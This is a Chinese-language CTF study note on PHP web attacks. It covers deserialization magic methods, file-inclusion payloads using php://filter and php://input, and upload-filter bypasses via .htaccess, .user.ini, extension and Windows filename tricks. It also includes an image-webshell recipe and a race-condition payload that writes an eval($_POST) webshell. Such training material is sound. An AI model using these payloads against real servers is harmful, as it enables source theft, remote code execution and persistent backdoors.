目录
常见魔术方法的触发
__construct() ? //创建类对象时调用 ? __destruct() ? //对象被销毁时触发 ? __call() ? //在对象中调用不可访问的方法时触发 ? __callStatic() ? //在静态方式中调用不可访问的方法时触发 ? __get() ? //调用类中不存在变量时触发(找有连续箭头的 this->a->b) ? __set() ? //给一个未定义的属性赋值时触发 ? __isset() ? //在不可访问的属性上调用isset()或empty()触发 ? __unset() ? //在不可访问的属性上使用unset()时触发 ? __sleep() ? //使用serialize()时触发 ? __wakeup() ? //执行unserialize()时触发 ? __toString() ? //当对象被当做字符串时自动调用(找echo $this->a这种、strtolower()等) ? __invoke() ? //对象被当做函数进行调用时触发(找有括号的类似$a()这种) ? __set_state() ? ? //使用var_export()时触发 ? __clone() ? //对象复制完成时调用 ? __autoload() ? //实例化一个未定义的类时触发 ? __debugInfo() ? //使用var_dump时触发
典型例题:[NISACTF 2022]babyserialize
NSSCTF 靶场地址:NSSCTF | 在线CTF平台
详细解题过程参考我之前的博客:https://myon6.blog.csdn.net/article/details/131565599?spm=1001.2014.3001.5502
文件包含:
常把可重复使用的函数写入到单个文件中,在使用该函数时,直接调用此文件,而无需再次编写函数,这一过程叫做包含。有时候由于网站功能需求,会让前端用户选择要包含的文件,而开发人员又没有对要包含的文件进行安全考虑,就导致攻击者可以通过修改文件的位置来让后台执行任意文件,从而导致文件包含漏洞。
文件包含函数:
1、include ? 2、require ? 3、include_once ? 4、require_once ? 5、highlight_file ? 6、show_source ? 7、flie ? 8、readfile ? 9、file_get_contents ? 10、file_put_contents ? 11、fopen
存在文件包含时就应该想到 php 伪协议的利用
常用的 php 伪协议:
用于读取源码
可以获取指定文件源码,当它与包含函数结合时,php://filter 流会被当作 php 文件执行,所以我们一般对其进行编码,让其不执行,从而导致任意文件读取。
convert.iconv.* 的用法:
convert.iconv.<input-encoding>.<output-encoding> 或者 convert.iconv.<input-encoding>/<output-encoding>
<input-encoding> 和 <output-encoding> 就是编码方式,有:
UCS-4* UCS-4BE UCS-4LE* UCS-2 UCS-2BE UCS-2LE UTF-32* UTF-32BE* UTF-32LE* UTF-16* UTF-16BE* UTF-16LE* UTF-7 UTF7-IMAP UTF-8* ASCII* EUC-JP* SJIS* eucJP-win* SJIS-win*
常用 payload :
最常见的编码方式: ?file=php://filter/read=convert.base64-encode/resource=flag.php 替换编码方式绕过的例子: ?file=php://filter//convert.iconv.SJIS*.UCS-4*/resource=flag.php ?file=php://filter/convert.iconv.utf8.utf16/resource=flag.php?
用于执行 PHP 代码
可以访问请求的原始数据的只读流,将post请求的数据当作 php 代码执行,当传入的参数作为文件名打开时,可以将参数设为php://input,同时 post 写入想要执行的 php 代码,php 执行时会将 post 内容当作文件内容,从而导致任意代码执行。
例如: http://127.0.0.1/cmd.php?cmd=php://input POST数据:<?php phpinfo()?>
典型例题:攻防世界的 fileclude 和 file_include
攻防世界靶场地址:https://adworld.xctf.org.cn/
详细解题过程可以参考我之前的博客:
https://myon6.blog.csdn.net/article/details/130188333
https://myon6.blog.csdn.net/article/details/130176864
使用 BurpSuite 抓包改后缀即可
将 Content-Type 改为 image/jpeg
这两个配置文件都可以使我们上传的图像类文件被当作php文件解析
关于这两个文件的基本内容:
.htaccess
<FilesMatch ".jpg">
? SetHandler application/x-httpd-php
</FilesMatch>.user.ini
auto_prepend_file=my.jpg等号后面的 my.jpg 就是你要上传的 jpg 类型的一句话木马的文件名
使用burpsuite爆破可能被解析的后缀
比如:
php2、php3、php4、php5、phps、pht、phtm、phtml、phpt、shtml 、pwml等等(也可以结合大小写绕过)
空格绕过、点绕过、::$DATA绕过
原理:Windows系统对于文件的重命名会自动把空格、点、::$DATA 去掉
因此我们可以在文件后缀添加空格、点、::$DATA 进行绕过(是在 burpsuite 抓包后修改)
文件包含漏洞:是指未对文件进行严格过滤,在代码中引入其他文件作为php文件执行。
图片马生成可以使用copy命令
copy 1.jpg/b + shell.php 2.jpg生成的2.jpg就是一个图片马
条件竞争原理:当我们成功上传了php文件,服务端会在短时间内将其删除,我们需要抢在它删除之前访问文件并生成一句话木马文件,所以访问包的线程需要大于上传包的线程。
上传的大致内容为:
<?php fputs(fopen("shell.php", "w"), '<?php @eval($_POST["shell"]); ?>'); ?>
需要结合 burpsuite 设置上传包和访问包的线程数
详细解释参考我之前的博客:https://myon6.blog.csdn.net/article/details/133562672